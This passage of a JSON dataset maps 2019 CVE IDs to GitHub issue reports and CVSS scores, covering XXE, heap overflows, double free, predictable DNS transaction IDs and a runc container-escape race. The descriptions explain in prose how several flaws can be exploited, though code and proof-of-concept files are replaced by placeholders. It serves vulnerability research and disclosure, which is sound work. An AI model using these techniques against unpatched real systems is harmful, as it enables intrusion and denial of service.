  40984. "description": "XML External Entity (XXE) Injection during import of aggregated report. APITAG APITAG XXE Injection is a type of attack against an application that parses XML input. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document. Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier. APITAG Steps to reproduce APITAG NUMBERTAG Using the XML file in the Gist URLTAG , run the following to create a zip attachment APITAG Copy and paste the base NUMBERTAG encoding into one of the test reports, for example FILETAG NUMBERTAG Import the aggregated report APITAG This will trigger the XXE injection and populate the database, given that the data fits into the database fields. APITAG Remediation APITAG Use a XML parser with entity expansion disabled. Please refer to this guideline URLTAG .",
  40985. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  40986. "severity": "HIGH",
  40987. "baseScore": 7.5,
  40988. "impactScore": 3.6,
  40989. "exploitabilityScore": 3.9
  40990. },
  40991. {
  40992. "CVE_ID": "CVE-2019-19703",
  40993. "Issue_Url_old": "https://github.com/ktorio/ktor/issues/1467",
  40994. "Issue_Url_new": "https://github.com/ktorio/ktor/issues/1467",
  40995. "Repo_new": "ktorio/ktor",
  40996. "Issue_Created_At": "2019-11-29T11:37:32Z",
  40997. "description": "Ktor client resends auth data to redirect location. Ktor Version and Engine Used Ktor HTTP client NUMBERTAG with Apache engine. Describe the bug Enable APITAG for http client and send request with auth data to the host APITAG which redirects to the host APITAG with auth data from host foo . To Reproduce Steps to reproduce the behavior: CODETAG Actual result: Authorization header data is leaked to the host APITAG . Expected behavior The Authorization header from original request to the host foo is cleared before establishing redirect request to the host bar . It's a good security practice. Comment It could be solved by cleaning the Authorization header in the APITAG feature: URLTAG",
  40998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  40999. "severity": "MEDIUM",
  41000. "baseScore": 6.1,
  41001. "impactScore": 2.7,
  41002. "exploitabilityScore": 2.8
  41003. },
  41004. {
  41005. "CVE_ID": "CVE-2019-19720",
  41006. "Issue_Url_old": "https://github.com/marcIhm/yabasic/issues/36",
  41007. "Issue_Url_new": "https://github.com/marcihm/yabasic/issues/36",
  41008. "Repo_new": "marcihm/yabasic",
  41009. "Issue_Created_At": "2019-12-10T13:08:41Z",
  41010. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing yabasic NUMBERTAG with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in flex.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  41011. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41012. "severity": "HIGH",
  41013. "baseScore": 8.8,
  41014. "impactScore": 5.9,
  41015. "exploitabilityScore": 2.8
  41016. },
  41017. {
  41018. "CVE_ID": "CVE-2019-19725",
  41019. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/242",
  41020. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/242",
  41021. "Repo_new": "sysstat/sysstat",
  41022. "Issue_Created_At": "2019-12-09T09:54:32Z",
  41023. "description": "Double free in APITAG When I run a sadf utility with FILETAG , it leads to a double free bug in APITAG ERRORTAG If skip_extra_struct fails at this line URLTAG , read_stats_from_file falls into format_error: label and tries to free buffer here]( URLTAG However buffer has already been freed [before URLTAG , causing a double free bug . Thanks",
  41024. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41025. "severity": "CRITICAL",
  41026. "baseScore": 9.8,
  41027. "impactScore": 5.9,
  41028. "exploitabilityScore": 3.9
  41029. },
  41030. {
  41031. "CVE_ID": "CVE-2019-19729",
  41032. "Issue_Url_old": "https://github.com/williamkapke/bson-objectid/issues/30",
  41033. "Issue_Url_new": "https://github.com/cabinjs/bson-objectid/issues/30",
  41034. "Repo_new": "cabinjs/bson-objectid",
  41035. "Issue_Created_At": "2019-12-07T21:03:35Z",
  41036. "description": "A vulnerability in APITAG We found that APITAG allows an attacker to generate a malformed objectid by inserting an additional property to his user input. Since objectid might be inserted into APITAG this might cause security issues like SQL injection. The vulnerable code is as follows: bson objectid will return early if it detects _bsontype == APITAG in user input object. As a result, objects in arbitrary forms can bypass formatting if they have a valid bsontype. URLTAG In fact, the official implementation (shown in the following code) enforces a stricter early return condition, i.e., only if the constructor of the user input object is APITAG URLTAG Reproduce script CODETAG",
  41037. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41038. "severity": "HIGH",
  41039. "baseScore": 7.5,
  41040. "impactScore": 3.6,
  41041. "exploitabilityScore": 3.9
  41042. },
  41043. {
  41044. "CVE_ID": "CVE-2019-19766",
  41045. "Issue_Url_old": "https://github.com/bitwarden/jslib/issues/52",
  41046. "Issue_Url_new": "https://github.com/bitwarden/jslib/issues/52",
  41047. "Repo_new": "bitwarden/jslib",
  41048. "Issue_Created_At": "2019-10-31T14:31:41Z",
  41049. "description": "SHA NUMBERTAG is a terrible choice for a PBKDF in NUMBERTAG FILETAG It looks like the only supported choice for a PBKDF is SHA NUMBERTAG This is possibly the worst choice available for a password based KDF, as a PBKDF should be relatively slow, and SHA NUMBERTAG is perhaps practically the fastest hash function on earth due to optimizations made for Bitcoin (e.g. cheap ASICs and suchlike). Even iterated, it's way too fast, and only getting faster. I was evaluating Bitwarden as a potential replacement for Dashlane APITAG sucks) but this is a real non starter for me. Please up your KDF game. It's NUMBERTAG Additional reading: URLTAG URLTAG TL;DR: Use Argon2. URLTAG",
  41050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  41051. "severity": "HIGH",
  41052. "baseScore": 7.5,
  41053. "impactScore": 3.6,
  41054. "exploitabilityScore": 3.9
  41055. },
  41056. {
  41057. "CVE_ID": "CVE-2019-19766",
  41058. "Issue_Url_old": "https://github.com/bitwarden/server/issues/589",
  41059. "Issue_Url_new": "https://github.com/bitwarden/server/issues/589",
  41060. "Repo_new": "bitwarden/server",
  41061. "Issue_Created_At": "2019-11-01T13:55:38Z",
  41062. "description": "Security Issue: KDF max iterations is too low. URLTAG URLTAG",
  41063. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  41064. "severity": "HIGH",
  41065. "baseScore": 7.5,
  41066. "impactScore": 3.6,
  41067. "exploitabilityScore": 3.9
  41068. },
  41069. {
  41070. "CVE_ID": "CVE-2019-19777",
  41071. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/109",
  41072. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/109",
  41073. "Repo_new": "saitoha/libsixel",
  41074. "Issue_Created_At": "2019-12-12T14:03:22Z",
  41075. "description": "heap buffer overflow in stbi__load_main at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in stbi__load_main at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  41076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41077. "severity": "HIGH",
  41078. "baseScore": 8.8,
  41079. "impactScore": 5.9,
  41080. "exploitabilityScore": 2.8
  41081. },
  41082. {
  41083. "CVE_ID": "CVE-2019-19778",
  41084. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/110",
  41085. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/110",
  41086. "Repo_new": "saitoha/libsixel",
  41087. "Issue_Created_At": "2019-12-12T15:11:41Z",
  41088. "description": "heap buffer overflow in load_sixel at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in load_sixel at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  41089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41090. "severity": "HIGH",
  41091. "baseScore": 8.8,
  41092. "impactScore": 5.9,
  41093. "exploitabilityScore": 2.8
  41094. },
  41095. {
  41096. "CVE_ID": "CVE-2019-19794",
  41097. "Issue_Url_old": "https://github.com/miekg/dns/issues/1043",
  41098. "Issue_Url_new": "https://github.com/miekg/dns/issues/1043",
  41099. "Repo_new": "miekg/dns",
  41100. "Issue_Created_At": "2019-12-05T19:08:46Z",
  41101. "description": "[security] Predictable TXID can lead to response forgeries. The default Id function uses math/rand, meaning the outputs are predictable, and an attacker might be able to use this to forge responses without being on path. Seeding math/rand from crypto/rand is pointless, as the math/rand algorithm is invertible: given a sequence of outputs it's possible to reconstruct the Rand state and predict all future outputs. Exploitation might be a little slower because the outputs are just NUMBERTAG bits, but it's likely to be possible. Unless NUMBERTAG or DNSSEC are used, response verification relies only on source port and TXID. They are both short, but the combination usually makes it hard for an off path attacker to win the race against the real answer. Without the TXID, the attacker has a very good chance of success at a Kaminsky Attack. A couple example scenarios: A DNS cache \u2014 the attacker makes a sequence of requests to get enough TXIDs to reverse the internal state of the RNG, then it causes a request to be issued by the cache to an upstream server, and knowing the TXID sends a spoofed answer to every port, poisoning the cache. A prober with an API, like say Let's Encrypt \u2014 the attacker causes a number of requests to its own domain to observe TXIDs, then causes a lookup for a target domain, and spoofs the response. Since the performance cost seems negligible NUMBERTAG I recommend doing the secure thing by default and just reading the NUMBERTAG bytes from crypto/rand. If there are performance problems, just using a APITAG should solve them, as most of the cost of crypto/rand is syscall overhead. Filing publicly as asked by APITAG",
  41102. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41103. "severity": "MEDIUM",
  41104. "baseScore": 5.9,
  41105. "impactScore": 3.6,
  41106. "exploitabilityScore": 2.2
  41107. },
  41108. {
  41109. "CVE_ID": "CVE-2019-19794",
  41110. "Issue_Url_old": "https://github.com/coredns/coredns/issues/3519",
  41111. "Issue_Url_new": "https://github.com/coredns/coredns/issues/3519",
  41112. "Repo_new": "coredns/coredns",
  41113. "Issue_Created_At": "2019-12-08T16:31:44Z",
  41114. "description": "APITAG NUMBERTAG Release Tracking. This issue is to keep track of NUMBERTAG release. Specifically we want to update the URLTAG that carries URLTAG /cc MENTIONTAG",
  41115. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41116. "severity": "MEDIUM",
  41117. "baseScore": 5.9,
  41118. "impactScore": 3.6,
  41119. "exploitabilityScore": 2.2
  41120. },
  41121. {
  41122. "CVE_ID": "CVE-2019-19794",
  41123. "Issue_Url_old": "https://github.com/coredns/coredns/issues/3547",
  41124. "Issue_Url_new": "https://github.com/coredns/coredns/issues/3547",
  41125. "Repo_new": "coredns/coredns",
  41126. "Issue_Created_At": "2019-12-16T21:18:11Z",
  41127. "description": "APITAG CVETAG . This is a public announcement of a security vulnerability discovered in earlier versions of APITAG before NUMBERTAG URLTAG As was mentioned in CVETAG , one of the upstream library miekg/dns used Golang's APITAG . This causes predictable TXID and may allow cache poisoning APITAG URLTAG for details). APITAG was impacted by this upstream vulnerability. The latest release of APITAG NUMBERTAG fixes this issue. We encourage all APITAG users to update to NUMBERTAG as soon as possible. The issue was discovered by MENTIONTAG we very much appreciate his contributions! \ud83d\udc4d This issue will keep open for a couple of weeks or so, so that it is visible to public.",
  41128. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41129. "severity": "MEDIUM",
  41130. "baseScore": 5.9,
  41131. "impactScore": 3.6,
  41132. "exploitabilityScore": 2.2
  41133. },
  41134. {
  41135. "CVE_ID": "CVE-2019-19794",
  41136. "Issue_Url_old": "https://github.com/miekg/dns/issues/1037",
  41137. "Issue_Url_new": "https://github.com/miekg/dns/issues/1037",
  41138. "Repo_new": "miekg/dns",
  41139. "Issue_Created_At": "2019-11-15T00:55:26Z",
  41140. "description": "Revisit randomness decision based on new performance data. In NUMBERTAG and NUMBERTAG some benchmarking data was provided showing that APITAG is faster than APITAG . However, those tests took too narrow a view. It's important to look at id generation in the actual context in which it's used. FILETAG that stands up a trivial DNS server, and sends a lot of queries at it. You can fiddle with values of parallel to try and max out local CPU. On my laptop, APITAG came close to maxing out my CPUs, and I was able to get an average qps of NUMBERTAG for crypto/rand vs NUMBERTAG for math/rand. This is a pretty tiny difference, and that's in optimal conditions. Across a real network, the qps would be much lower, which means the impact of using crypto/rand would be much lower. I'd like to propose making APITAG the default, so users don't have to worry about whether they need more secure ID generation. CODETAG",
  41141. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41142. "severity": "MEDIUM",
  41143. "baseScore": 5.9,
  41144. "impactScore": 3.6,
  41145. "exploitabilityScore": 2.2
  41146. },
  41147. {
  41148. "CVE_ID": "CVE-2019-19795",
  41149. "Issue_Url_old": "https://github.com/michaelforney/samurai/issues/29",
  41150. "Issue_Url_new": "https://github.com/michaelforney/samurai/issues/29",
  41151. "Repo_new": "michaelforney/samurai",
  41152. "Issue_Created_At": "2019-12-13T18:05:45Z",
  41153. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing samurai NUMBERTAG with American Fuzzy Lop, I found a heap based buffer overflow in the APITAG function, in util.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  41154. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41155. "severity": "HIGH",
  41156. "baseScore": 7.8,
  41157. "impactScore": 5.9,
  41158. "exploitabilityScore": 1.8
  41159. },
  41160. {
  41161. "CVE_ID": "CVE-2019-19796",
  41162. "Issue_Url_old": "https://github.com/marcIhm/yabasic/issues/37",
  41163. "Issue_Url_new": "https://github.com/marcihm/yabasic/issues/37",
  41164. "Repo_new": "marcihm/yabasic",
  41165. "Issue_Created_At": "2019-12-13T19:41:08Z",
  41166. "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing yabasic NUMBERTAG with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in function.c. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  41167. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41168. "severity": "HIGH",
  41169. "baseScore": 7.8,
  41170. "impactScore": 5.9,
  41171. "exploitabilityScore": 1.8
  41172. },
  41173. {
  41174. "CVE_ID": "CVE-2019-19847",
  41175. "Issue_Url_old": "https://github.com/fontforge/libspiro/issues/21",
  41176. "Issue_Url_new": "https://github.com/fontforge/libspiro/issues/21",
  41177. "Repo_new": "fontforge/libspiro",
  41178. "Issue_Created_At": "2019-12-17T10:19:54Z",
  41179. "description": "Stack based buffer overflow in the APITAG function. Hi, When building libspiro NUMBERTAG with APITAG enabled and running the test suite, I found a stack based buffer overflow in APITAG in spiro.c. In the test suite, APITAG to APITAG all trigger the same issue. The issue can be triggered as follow: APITAG ERRORTAG",
  41180. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41181. "severity": "HIGH",
  41182. "baseScore": 8.1,
  41183. "impactScore": 5.9,
  41184. "exploitabilityScore": 2.2
  41185. },
  41186. {
  41187. "CVE_ID": "CVE-2019-19887",
  41188. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/14",
  41189. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/14",
  41190. "Repo_new": "rockcarry/ffjpeg",
  41191. "Issue_Created_At": "2019-12-17T15:58:08Z",
  41192. "description": "APITAG in jfif_encode at APITAG run APITAG in linux result in gdb. APITAG steam is a pointer which is null in this case. Dereferencing a null pointer causes a segmentation fault. fix: CODETAG FILETAG",
  41193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41194. "severity": "MEDIUM",
  41195. "baseScore": 6.5,
  41196. "impactScore": 3.6,
  41197. "exploitabilityScore": 2.8
  41198. },
  41199. {
  41200. "CVE_ID": "CVE-2019-19888",
  41201. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/13",
  41202. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/13",
  41203. "Repo_new": "rockcarry/ffjpeg",
  41204. "Issue_Created_At": "2019-12-17T06:48:47Z",
  41205. "description": "Denial of Service caused by dividing by zero without a sanity check in jfif.c. file: jfif.c function: jfif_decode line NUMBERTAG mcuw = sfh_ma NUMBERTAG mcuh = sfv_ma NUMBERTAG jw = ALIGN(jfif >width , mcuw); jh = ALIGN(jfif >height, mcuh); mcuc = jw / mcuw; < mcuw can be zero mcur = jh / mcuh; // calculate mcu info",
  41206. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41207. "severity": "MEDIUM",
  41208. "baseScore": 6.5,
  41209. "impactScore": 3.6,
  41210. "exploitabilityScore": 2.8
  41211. },
  41212. {
  41213. "CVE_ID": "CVE-2019-19899",
  41214. "Issue_Url_old": "https://github.com/PebbleTemplates/pebble/issues/493",
  41215. "Issue_Url_new": "https://github.com/pebbletemplates/pebble/issues/493",
  41216. "Repo_new": "pebbletemplates/pebble",
  41217. "Issue_Created_At": "2019-12-18T21:59:56Z",
  41218. "description": "Unsafe Methods Bypass. I was reading about URLTAG and found a bypass to the fix in NUMBERTAG URLTAG . The following code will throw a security exception after the fix in NUMBERTAG APITAG However you can still access APITAG via the APITAG signature: ERRORTAG",
  41219. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41220. "severity": "CRITICAL",
  41221. "baseScore": 9.8,
  41222. "impactScore": 5.9,
  41223. "exploitabilityScore": 3.9
  41224. },
  41225. {
  41226. "CVE_ID": "CVE-2019-19906",
  41227. "Issue_Url_old": "https://github.com/cyrusimap/cyrus-sasl/issues/587",
  41228. "Issue_Url_new": "https://github.com/cyrusimap/cyrus-sasl/issues/587",
  41229. "Repo_new": "cyrusimap/cyrus-sasl",
  41230. "Issue_Created_At": "2019-11-28T15:38:04Z",
  41231. "description": "Off by one in _sasl_add_string function. Dear Cyrus SASL team \u2014 During tests against openldap NUMBERTAG I have detected an off by one error in _sasl_add_string function. In case of openldap this bug can cause a denial of service condition or has other unspecified impact. Valgrind output from openldap ERRORTAG Patch CODETAG Please let me know what additional information I can provide to fix the issue. Stephan Zeisberg",
  41232. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  41233. "severity": "HIGH",
  41234. "baseScore": 7.5,
  41235. "impactScore": 3.6,
  41236. "exploitabilityScore": 3.9
  41237. },
  41238. {
  41239. "CVE_ID": "CVE-2019-19909",
  41240. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/5302",
  41241. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/5302",
  41242. "Repo_new": "pkp/pkp-lib",
  41243. "Issue_Created_At": "2019-11-26T20:40:21Z",
  41244. "description": "Use json_encode/json_decode instead of serialize/unserialize in report generator. JSON is limited to simple constructs like arrays, strings, and numbers. serialize / ERRORTAG can be used to describe more complex objects, which may not be trustworthy. Use APITAG / APITAG instead of serialize / ERRORTAG in the report generator. Review elsewhere for similar usage.",
  41245. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41246. "severity": "HIGH",
  41247. "baseScore": 8.8,
  41248. "impactScore": 5.9,
  41249. "exploitabilityScore": 2.8
  41250. },
  41251. {
  41252. "CVE_ID": "CVE-2019-19921",
  41253. "Issue_Url_old": "https://github.com/opencontainers/runc/issues/2197",
  41254. "Issue_Url_new": "https://github.com/opencontainers/runc/issues/2197",
  41255. "Repo_new": "opencontainers/runc",
  41256. "Issue_Created_At": "2020-01-01T13:07:23Z",
  41257. "description": "[ CVETAG ]: Volume mount race condition with shared mounts. Disclosed in URLTAG Here's the original report to APITAG Hi all, an attacker who controls the container image for two containers that share a volume can race volume mounts during container initialization, by adding a symlink to the rootfs that points to a directory on the volume. The second container won't be able to see the actual mount, but it can race it by modifying the mount point on the volume. This can be exploited for a full container breakout by racing readonly/mask mounts, allowing writes to dangerous paths like APITAG . Example: The rootfs of container A has a symlink APITAG > APITAG Container A specifies a named volume mounted to APITAG Container B, started before container A, shares this named volume and repeatedly swaps APITAG and APITAG Container A mounts procfs to APITAG , but when it remounts APITAG , it does so at APITAG . This can reliably be reproduced using runc and podman on Fedora NUMBERTAG takes about NUMBERTAG s to win the race for me): URLTAG APITAG would ordinarily prevent the exploit by disallowing APITAG from writing APITAG , but it can be disabled by symlinking APITAG to something benign like APITAG (bypassing the procfs check). APITAG can be disabled similarly. Docker specifies the mounts in a different order and mounts procfs after it mounts the volumes, mounting over the /proc symlink, which appears to prevent at least the /proc approach. I haven't tested other runc usage scenarios, for instance, k8s+cri o might be vulnerable as well. Fabian of Cure NUMBERTAG in CC) created a minimal APITAG that uses runc directly: URLTAG There are other container init steps after the volume mount that can be raced, obvious ones being APITAG and the APITAG attrs but there might be others, especially in APITAG (like tricking remount into mounting the rootfs as rshared if there's another volume that specifies the flag, but I haven't tried that). \nThis is similar to the vulnerability I reported that Adam Iwaniuk disclosed during their Dragon Sector CTF ( URLTAG and a similar crun one ( URLTAG The fix for the mounts is probably what Aleksa outlined here, using PATHTAG to resolve the path: URLTAG",
  41258. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  41259. "severity": "HIGH",
  41260. "baseScore": 7.0,
  41261. "impactScore": 5.9,
  41262. "exploitabilityScore": 1.0
  41263. },
  41264. {
  41265. "CVE_ID": "CVE-2019-19922",
  41266. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/67577",
  41267. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/67577",
  41268. "Repo_new": "kubernetes/kubernetes",
  41269. "Issue_Created_At": "2018-08-20T04:06:20Z",
  41270. "description": "CFS quotas can lead to unnecessary throttling. > /kind bug This is not a bug in Kubernetes per se, it's more of a heads up. I've read this great blog post: URLTAG From the blog post I learned that k8s is using cfs quotas to enforce CPU limits. Unfortunately, those can lead to unnecessary throttling, especially for well behaved tenants. See this unresolved bug in Linux kernel I filed a while back: CVETAG There's an open and stalled patch that addresses the issue (I've not verified if it works): URLTAG cc MENTIONTAG APITAG",
  41271. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  41272. "severity": "MEDIUM",
  41273. "baseScore": 5.5,
  41274. "impactScore": 3.6,
  41275. "exploitabilityScore": 1.8
  41276. },
  41277. {
  41278. "CVE_ID": "CVE-2019-19930",
  41279. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/193",
  41280. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/193",
  41281. "Repo_new": "mz-automation/libiec61850",
  41282. "Issue_Created_At": "2019-12-20T13:37:27Z",
  41283. "description": "Denial of Service, caused by integer overflow in function APITAG PATHTAG Function APITAG doesn't check whether argument APITAG is negative. If it is a negative number, then the argument which malloc will use later is a huge number. For example NUMBERTAG would be interpreted as NUMBERTAG ffffffff on NUMBERTAG bit arch or NUMBERTAG ffffffffffffffff on NUMBERTAG bit arch. APITAG poc: FILETAG steps to reproduce NUMBERTAG compile libiec NUMBERTAG with compiler flag APITAG NUMBERTAG compile test.c in FILETAG NUMBERTAG run: APITAG in gdb result in gdb ERRORTAG",
  41284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41285. "severity": "MEDIUM",
  41286. "baseScore": 6.5,
  41287. "impactScore": 3.6,
  41288. "exploitabilityScore": 2.8
  41289. },
  41290. {
  41291. "CVE_ID": "CVE-2019-19931",
  41292. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/194",
  41293. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/194",
  41294. "Repo_new": "mz-automation/libiec61850",
  41295. "Issue_Created_At": "2019-12-20T13:55:52Z",
  41296. "description": "Heap overflow in function APITAG PATHTAG Function APITAG has heap overflow vulnerability in file PATHTAG APITAG poc: FILETAG steps to reproduce NUMBERTAG compile libiec NUMBERTAG with compiler flag APITAG NUMBERTAG compile test.c in FILETAG NUMBERTAG run: APITAG in gdb result in gdb ERRORTAG",
  41297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41298. "severity": "HIGH",
  41299. "baseScore": 8.8,
  41300. "impactScore": 5.9,
  41301. "exploitabilityScore": 2.8
  41302. },
  41303. {
  41304. "CVE_ID": "CVE-2019-19944",
  41305. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/196",
  41306. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/196",
  41307. "Repo_new": "mz-automation/libiec61850",
  41308. "Issue_Created_At": "2019-12-23T07:20:53Z",
  41309. "description": "Denial of service caused in function APITAG in PATHTAG APITAG in PATHTAG doesn't check passed arguments. APITAG and APITAG can be large numbers, so the following memory access APITAG would cause a segmentation fault. APITAG poc: FILETAG gdb stack backtrace: CODETAG",
  41310. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41311. "severity": "MEDIUM",
  41312. "baseScore": 6.5,
  41313. "impactScore": 3.6,
  41314. "exploitabilityScore": 2.8
  41315. },
  41316. {
  41317. "CVE_ID": "CVE-2019-19948",
  41318. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1562",
  41319. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1562",
  41320. "Repo_new": "imagemagick/imagemagick",
  41321. "Issue_Created_At": "2019-04-29T03:08:25Z",
  41322. "description": "heap buffer overflow in APITAG of coders/sgi.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of coders/sgi.c. Steps to Reproduce APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG NUMBERTAG fee NUMBERTAG cf NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING APITAG Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG APITAG Copyright NUMBERTAG APITAG Studio LLC APITAG License: FILETAG APITAG Features: Cipher DPC HDRI APITAG APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib APITAG Distributor ID: Ubuntu APITAG Description: Ubuntu NUMBERTAG LTS APITAG Release NUMBERTAG APITAG Codename: xenial` Additional information: APITAG",
  41323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  41324. "severity": "CRITICAL",
  41325. "baseScore": 9.8,
  41326. "impactScore": 5.9,
  41327. "exploitabilityScore": 3.9
  41328. },
  41329. {
  41330. "CVE_ID": "CVE-2019-19949",
  41331. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1561",
  41332. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1561",
  41333. "Repo_new": "imagemagick/imagemagick",
  41334. "Issue_Created_At": "2019-04-29T02:55:44Z",
  41335. "description": "heap buffer overflow in APITAG of png.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in function APITAG of png.c. Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap 